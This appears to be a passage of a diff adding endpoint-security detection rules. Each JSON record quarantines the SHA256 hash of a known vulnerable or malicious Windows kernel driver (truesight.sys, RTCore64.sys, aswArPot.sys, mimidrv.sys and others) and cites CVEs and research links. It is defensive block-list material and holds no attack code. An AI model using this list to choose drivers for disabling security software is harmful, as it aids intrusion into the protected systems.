"effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.145623Z", + "creation_date": "2026-03-23T11:45:31.145625Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.145630Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "69a8e57b60cec2be20e3ccb5df2e019a000d29120b05294b98f1453ea2386333", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "775edca8-bf4b-51c5-b245-c39dfd3bebec", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.489057Z", + "creation_date": "2026-03-23T11:45:31.489059Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.489065Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + 
"references": [], + "type": "hash", + "value": "3653b2e37210321129e87c3acd7572bd0200bb13a68fa382705ec79c02c6f3ad", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "77653978-2015-5199-b8ec-3a6c948a2fb1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.486346Z", + "creation_date": "2026-03-23T11:45:31.486349Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.486357Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9551a6958011dd3b5c70fa7ec25b4d1decff0d8e9ba9875bacab06adc6eed9e8", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7769ba24-8dd4-50da-afed-b6a468b3bcdd", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": 
"af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.460891Z", + "creation_date": "2026-03-23T11:45:30.460894Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.460904Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4eb1b9f3fe3c79f20c9cdeba92f6d6eb9b9ed15b546851e1f5338c0b7d36364b", + "comment": "Vulnerable Kernel Driver (aka RTCore64.sys) [https://www.loldrivers.io/drivers/e32bc3da-4db1-4858-a62c-6fbe4db6afbd/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "776a8b23-bee6-55d5-a2a5-7b462d0e3160", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.617782Z", + "creation_date": "2026-03-23T11:45:29.617784Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.617789Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c9cf1d627078f63a36bbde364cd0d5f2be1714124d186c06db5bcdf549a109f8", + "comment": "Getac Technology vulnerable BIOS update tool (aka 
mtcBSv64.sys) [https://www.loldrivers.io/drivers/3bc629e8-7bf8-40c2-965b-87eb155e0065/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7777b725-f411-5be2-a4cc-0ecc91efcfe2", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.144334Z", + "creation_date": "2026-03-23T11:45:32.144337Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.144342Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "289761eef2976b001879181b97324408e849729dbf41403fb73ee85565667012", + "comment": "Malicious Kernel Driver (aka idmtdi.sys) [https://www.loldrivers.io/drivers/c2e98102-2055-48f0-9449-3e7a7f2c0ffe/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "778d68f5-f8fc-5f57-884b-750a324caebb", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.145570Z", + "creation_date": "2026-03-23T11:45:31.145572Z", + "enabled": true, + 
"block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.145578Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f3ec72b09bf08acde63cb70be268d3dc8024e475a09016be6ba84389613842f0", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "779ad2b7-43c4-59c1-9613-a69705cb4a6d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.605953Z", + "creation_date": "2026-03-23T11:45:29.605956Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.605978Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "bdbceca41e576841cad2f2b38ee6dbf92fd77fbbfdfe6ecf99f0623d44ef182c", + "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "77ab0f68-a723-5bc1-88bd-a3d02660da9f", + "test_maturity_current_count": 0, + 
"test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.150000Z", + "creation_date": "2026-03-23T11:45:31.150002Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.150008Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "10aef6faf4aacd54afa01b6e5476be5c5c12bf65fb938150a23058646cf006ed", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "77ac351a-d90f-5f9b-85e3-bb9ef210e769", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.969452Z", + "creation_date": "2026-03-23T11:45:29.969454Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.969460Z", + "rule_level": null, + 
"rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2cd8e9eb8e4754f07fdfc8c3aae4d7fc0d25b346884c3474db35c757d2994b34", + "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "77af0422-e09d-5357-905f-a31d166784ea", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.487613Z", + "creation_date": "2026-03-23T11:45:31.487615Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.487621Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "653ed33a842c6b966785d9cf3e1e794e28585305e989f70954ccf0e9f9126444", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "77b2ede8-c6ef-595f-87a9-78cc356f5e7a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + 
"rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.829501Z", + "creation_date": "2026-03-23T11:45:30.829503Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.829508Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f5b43b85c87271641e2ac41768851284a02b3eb578946a32c9b0e762f2c00dcc", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "77b45c06-d4fb-5167-b87b-420515322979", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.490243Z", + "creation_date": "2026-03-23T11:45:31.490245Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.490251Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"ddb9683ac78ea953dc06145752a8662f16485eeddbcca3e7f466d3d148d2d2ce", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "77b5a870-8639-54ee-9d54-a7ff3674cb16", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.622508Z", + "creation_date": "2026-03-23T11:45:29.622510Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.622516Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "092349aebdac28294dbad1656759d8461f362d1a36b01054dccf861d97beadf0", + "comment": "PassMark vulnerable driver (aka DirectIo32.sys and DirectIo64.sys) [CVE-2020-15479] [https://github.com/eset/vulnerability-disclosures/blob/master/CVE-2020-15479/CVE-2020-15479.md] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "77b91e54-81ce-56d0-8587-ac1517abcbdb", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + 
"last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.469981Z", + "creation_date": "2026-03-23T11:45:30.469984Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.469993Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9fba340eece424f30bdf80126f2d72eba5165bc174ccfb5e240b281639f675e3", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "77c6fba4-3cc2-532a-93f2-a3648acc9a78", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.810100Z", + "creation_date": "2026-03-23T11:45:31.810103Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.810112Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "fc02b24769fc1f663fd40d2d4733e22276d08856730422f5595d4418d656a80f", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) 
[https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "77d18535-fce9-5b08-b599-c1fee5dc51d9", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.478258Z", + "creation_date": "2026-03-23T11:45:30.478261Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.478270Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "07e8a7f0fcc8be78167704c6679c70ea184961f5a5bd2066620a4b7eeb939885", + "comment": "Vulnerable Kernel Driver (aka elbycdio.sys) [https://www.loldrivers.io/drivers/855ade1f-8a9e-4c9d-ab8e-d7e409609852/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "77dd89f9-ef8b-565c-b785-221113a73cec", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.607800Z", + "creation_date": "2026-03-23T11:45:29.607802Z", + "enabled": true, + 
"block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.607807Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b1867d13a4cab66a76f4d4448824ca0cb3a176064626f9618c0c103ee3cb4f47", + "comment": "Micro-Star MSI Afterburner vulnerable driver (aka RTCore32.sys and RTCore64.sys) [CVE-2019-16098] [https://www.loldrivers.io/drivers/275c80c5-a67c-4536-b29e-4e481242cb01/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "77fc4491-498b-520f-96ef-ced91cd7467b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.815384Z", + "creation_date": "2026-03-23T11:45:31.815386Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.815391Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e4dd128411779f4e1e0a9b15dfec68c671e9b6b4b429c06668b048b15d230ea0", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "77fcec05-7565-50a9-adf3-2393067c03ed", + 
"test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.474474Z", + "creation_date": "2026-03-23T11:45:30.474477Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.474486Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "718e76d8cdcdf7b06342b5137f5591233aece4bf70fa9d761d38bd02993a0906", + "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7802e821-d9dc-5cdf-b254-4843786bf3c4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.835954Z", + "creation_date": "2026-03-23T11:45:30.835957Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.835965Z", + "rule_level": null, + 
"rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "563a68c814f5f720b44eb252d2b4d10c048ff8034d5d44c9796862b9487a4e48", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "78110f68-ba90-5a8f-a4d4-bda3e7ac5e34", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.836487Z", + "creation_date": "2026-03-23T11:45:30.836489Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.836494Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "823d2d249504e080aa8ca2af09f3b147675f21ba1953a0164efe3d9e90b7b12b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7817cbc4-ea14-5326-8e1b-1211056888ac", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": 
"critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.815898Z", + "creation_date": "2026-03-23T11:45:31.815900Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.815906Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "59a23a5ecb1d083892900e8590d97645cd01e6b6e1ae823144b833ff9311217f", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "781863cd-dfa9-570a-88f3-6b80b7e5569d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.144932Z", + "creation_date": "2026-03-23T11:45:31.144936Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.144942Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"c490af54e5d4ae907873bcd1279907445b1f37413b4ec081a8b36bfb303db19d", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "78190055-60c9-50ab-b3ab-d02cbf0c3dc0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.827578Z", + "creation_date": "2026-03-23T11:45:30.827580Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.827585Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 